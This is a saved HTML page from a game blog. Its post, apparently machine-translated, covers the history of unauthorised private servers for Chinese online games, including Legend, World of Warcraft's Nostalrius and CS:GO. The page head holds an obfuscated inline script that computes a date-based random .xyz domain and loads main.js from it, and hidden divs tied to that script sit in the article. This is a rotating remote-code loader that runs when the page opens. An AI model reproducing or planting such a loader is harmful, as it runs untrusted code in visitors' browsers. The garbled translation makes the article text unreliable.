<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="18 years ago, China’s online games rose abruptly. Many games witnessed the changes of China’s game industry and left many happy memories for many players. In the long history of China’s online games,">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Better game experience Private server the eyesore of online game manufacturers">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="18 years ago, China’s online games rose abruptly. Many games witnessed the changes of China’s game industry and left many happy memories for many players. In the long history of China’s online games,">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/70b4e7d4efd546e78fa58b0e6a19dd02.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/5ae8ac7fe52c4c9ca34e97a22ed34903.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/a960a12288174949ba3c2744c0dc977e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/667065c0daf34e63b77f9f09b2c8e951.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/67d692ea623f4308892ab6e80b66a89a.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/6b6f4cd662c74d8fa1bff3c5cc8d292f.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/fa672af4ae474d419fe4ffe7dc8959b9.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Better game experience Private server the eyesore of online game manufacturers">
<meta name="twitter:description" content="18 years ago, China’s online games rose abruptly. Many games witnessed the changes of China’s game industry and left many happy memories for many players. In the long history of China’s online games,">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/70b4e7d4efd546e78fa58b0e6a19dd02.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Better game experience Private server the eyesore of online game manufacturers | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Better game experience Private server the eyesore of online game manufacturers</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>18 years ago, China’s online games rose abruptly. Many games witnessed the changes of China’s game industry and left many happy memories for many players. In the long history of China’s online games, there are many games that have to decline because of many other factors, which is closely related to the emergence of plug-in, but today’s protagonist is not plug-in, but even more vicious than plug-in, that is private server. Up to now, we can see all kinds of private servers of the old game on various web pages, so in the end, what is the private server? Why are so many people willing to play? Why do private servers exist more vicious than plug-ins?</p>
<p>#The rise of private service<br>It is well known that there has always been a cracked piracy in single player games, and the private server is the “piracy” of online games. The private server is the network server that the individual obtains the server installation program and builds without authorization. Its purpose is to divide the game players and make profits from it.<br>Because it’s a personal server, most systems of the game can be modified artificially, which meets the needs that many official game servers can’t meet. For example, if you fill hundreds of pieces in a game, you may just start a low-level VIP, while in the private server, you may have been a high-level member since you started online. Some private servers do not choose to open to the outside world or make profits. Such servers are generally small in scale. They are only assumed in the Internet bar for the purpose of entertainment. It reduces the consumption cost of the game and enjoys better game experience, so private server can attract so many players.<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/70b4e7d4efd546e78fa58b0e6a19dd02.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>These “+ 999” and “one knife 999” are also derived from private service<br>Whether it is profitable or not, the existence of private server means that the revenue and flow of official server will be greatly affected, and the market retention rate of game is also very problematic, which is illegal in any case. In the first generation of online games, the most representative work is “Internet creation century” (hereinafter referred to as UO), which is also the first work to appear in the Chinese game market. However, few people know that the game entered the Chinese game market not through the agent operation of Internet manufacturers, but through private services.<br>At that time, the R &amp; D technology of online games was limited, and players who knew a little about the program could tamper with the game code around the world. At that time, no manufacturer in the Chinese market realized that they could make profits through online games. In other words, it was because of the emergence of private online games that manufacturers began to pay attention to the online game industry, but also It is because of the private service that the online game environment at that time was so smoky.<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/5ae8ac7fe52c4c9ca34e97a22ed34903.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>The most difficult problem is the language setting of Internet creation</p>
<h1 id="full-explosion"><a href="#full-explosion" class="headerlink" title="full explosion"></a>full explosion</h1><p>In 2000, the king of kings, which originated from Taiwan, entered the mainland of China and became the first graphic online game in the history of Chinese online games and achieved great success. Taking this opportunity, a series of works, such as legend, miracle, Three Kingdoms on the Internet and so on, successively appeared on the market, raising the online games of China to an unprecedented height. At that time, the mainstream online games basically adopted the charging system of point card and monthly card. At that time, not everyone had the conditions to put some money into the game with the consumption level at that time, so to a large extent, many shy young people and student players were dissuaded. They were eager to have free games and could only be addicted through game magazines or TV programs The kind of player is not in the minority, but also is to see this point, then appeared above in the Internet bar, not for the purpose of profit-making private server.<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/a960a12288174949ba3c2744c0dc977e.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>Although it seems that the picture of king of Kings is simple now, it carried the memories of countless people at that time<br>In the middle of 2002, the Italian server program of legendary, a classic online game from South Korea, was accidentally leaked. After entering China, the private service of legendary spread at an explosive speed. In less than half a year, about 500 private services could be found on the market to operate at the same time. These private servers have low charges, high explosion rate and fast upgrade, and are favored by players who fail to get a good experience in the official server.<br>Private server absorbed the water of the players in the official uniform of legend. The most uncomfortable one was Shanda network, which was responsible for the agency work in China. The players were seriously separated, and Shanda could only stand on one side and was helpless. Later, Shanda also tore his face. He refused to pay the share of the game on the ground that the Korean developers could not solve the technical problems, and ran away with the money he earned. Therefore, legend declined, and the company relationship between China and South Korea was completely broken.<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/667065c0daf34e63b77f9f09b2c8e951.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>Nowadays, the private servers of legend are mainly page tours<br>Taking this incident as an opportunity, many people have taken a fancy to the revenue capacity of private service, so there is such a gray industry chain in the places outside the law. There are special people who are responsible for stealing the service end or source code of the game. If they can’t steal it, they will edit it by themselves according to the gourd gourd gourd ladle. These people will put the compiled programs on the Internet for sale, and those who intend to buy these services only need to pay money It’s a game private server with a fool’s server building tutorial, which can modify the game parameters by itself. The lowering of the threshold for building a private server means that more games have launched private servers one after another, and even many unexpected games have private servers, such as world of Warcraft, League of heroes, watch vanguard and even Jedi survive The service comprehensively optimizes the existing problems such as balance or playability in the official service, and constantly introduces new content, so many private services are even more popular than the official service.<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/67d692ea623f4308892ab6e80b66a89a.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>Imagine landing on the ground with three-level head AWM’s Jedi survival, which is probably the feeling (funny)</p>
<p>#How to deal with private services<br>Most manufacturers hold the same attitude of cracking down on private service as plug-in service. After all, this is a kind of existence that does not melt into the official and legal provisions. As early as 2016, the biggest nostalgic private service of world of Warcraft, nostalrius (n-service for short), was sued by Blizzard, the developer of world of Warcraft, saying that private service infringed the rights and interests of official service, demanded to claim and stop service, and won the lawsuit successfully. This event triggered the dissatisfaction of nearly 150000 people in N-Server and 100000 people who loved nostalgic service, and a total of 250000 players.<br>This amazing number of people surprised blizzard. Even the elders who once made ancient versions killed back to Blizzard’s headquarters and asked for nostalgic clothes to be opened. In the face of this situation, the senior officials were also thoughtful about this, so he invited the producers of n-clothes to negotiate with other private server managers. After many market surveys and discussions, Blizzard decided to launch their own clothes Although the quality of the official nostalgic clothes is poor, it still appeases the dissatisfaction of the players.<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/6b6f4cd662c74d8fa1bff3c5cc8d292f.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>Although it is private service, the game environment of n-service is thriving<br>There is no absoluteness, and not everyone thinks so. There is such a person who is completely open to private servers. He is g Pang. He is almost indifferent to the private server (called community service and platform in the game) of his own game “csgo”. Moreover, the server of official service only has 64 ticks (data transmission speed per second), but the server of the platform has 128 ticks. G fat doesn’t need to change the server’s money, but even if it doesn’t change, it can have a better experience and doesn’t affect the game. The box should be opened, the accessories should be bought, and what’s the fun Why not?<br><img src="http://maiygu.xyz/2019/11/08/Better game experience Private server the eyesore of online game manufacturers/fa672af4ae474d419fe4ffe7dc8959b9.jpg" alt="Better game experience Private server the eyesore of online game manufacturers"><br>There are many hidden sub-systems on the platform that the official server does not have<br>    concluding remarks<br>The continuous emergence of private server also shows that there are various or big or small problems in the current online game environment. It may be that the game balance is not good, the charges may be unreasonable, or the game content may be too scarce. If the developers deal with the operation of the game properly, how can there be so many private servers? If the game made by the government can’t compare with private service, what is the persuasive force to fight against private service?<br>However, I’d like to remind you that although the experience of private service may be better than that of the official, it is illegal in the gray area in any case unless it’s official approval, and it’s far less than the official in terms of security and service, so I don’t recommend you to try private service.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Blizzard is not the only CG factory players are talking about/" rel="next" title="Blizzard is not the only CG factory players are talking about">
                <i class="fa fa-chevron-left"></i> Blizzard is not the only CG factory players are talking about
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Breakthrough, update, iteration, horizontal game that never stops evolution/" rel="prev" title="Breakthrough, update, iteration, horizontal game that never stops evolution">
                Breakthrough, update, iteration, horizontal game that never stops evolution <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#full-explosion"><span class="nav-number">1.</span> <span class="nav-text">full explosion</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
